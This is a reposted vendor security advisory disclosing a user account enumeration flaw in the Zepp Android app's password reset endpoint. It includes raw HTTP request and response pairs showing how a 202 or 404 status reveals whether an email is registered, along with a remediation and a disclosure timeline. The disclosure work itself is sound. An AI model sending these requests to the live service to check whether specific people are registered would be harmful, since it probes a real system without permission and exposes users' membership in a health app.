Zepp 6.1.4-play User Account Enumeration

2022.05.01
Credit: Karima Hebbal
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-204

# Trovent Security Advisory 2108-02 # ##################################### User account enumeration in password reset function ################################################### Overview ######## Advisory ID: TRSA-2108-02 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2108-02 Affected product: Zepp Android mobile application (com.huami.watch.hmwatchmanager) Tested versions: Zepp 6.1.4-play Vendor: Huami Inc., https://www.zepp.com Credits: Trovent Security GmbH, Karima Hebbal Detailed description #################### Zepp is a mobile application to collect health information from Zepp or Amazfit devices. Trovent Security GmbH discovered a user account enumeration vulnerability in the password reset function of the Zepp mobile application. This vulnerability allows to check if a user with a specific email address is registered or not. Severity: Medium CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) CWE ID: CWE-204 CVE ID: N/A Proof of concept ################ Sample HTTP request sent with a registered email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DELETE /registrations/ptesttest33%40gmail.com/password?region=us-west-2&marketing=AmazFit HTTP/2 Host: api-user.huami.com App_name: com.huami.midong Accept-Language: en-US X-Request-Id: a8a25f6c-e392-4013-b39d-d8b68db532a0 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003) Accept-Encoding: gzip, deflate Content-Length: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The server response to a valid email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/2 202 Accepted Date: Mon, 30 Aug 2021 12:38:52 GMT Content-Type: application/json Content-Length: 39 Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers "HuaMi Oauth / User Registration 2.0.2" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sample HTTP request sent with a non-registered email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DELETE /registrations/false%40gmail.com/password?region=us-west-2&marketing=AmazFit HTTP/2 Host: api-user.huami.com App_name: com.huami.midong Accept-Language: en-US X-Request-Id: a8a25f6c-e392-4013-b39d-d8b68db532a0 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003) Accept-Encoding: gzip, deflate Content-Length: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The server response to an invalid email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/2 404 Not Found Date: Mon, 30 Aug 2021 12:40:08 GMT Content-Type: application/json Content-Length: 39 Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers "HuaMi Oauth / User Registration 2.0.2" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution / Workaround ##################### Ensure the application returns a consistent message for both existent and non-existent accounts during the password reset process. History ####### 2021-08-30: Vulnerability found & advisory created 2021-09-24: Vendor contacted 2021-10-25: Vendor contacted again 2021-11-18: Vendor contacted again 2022-04-27: No reaction from vendor, advisory published


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top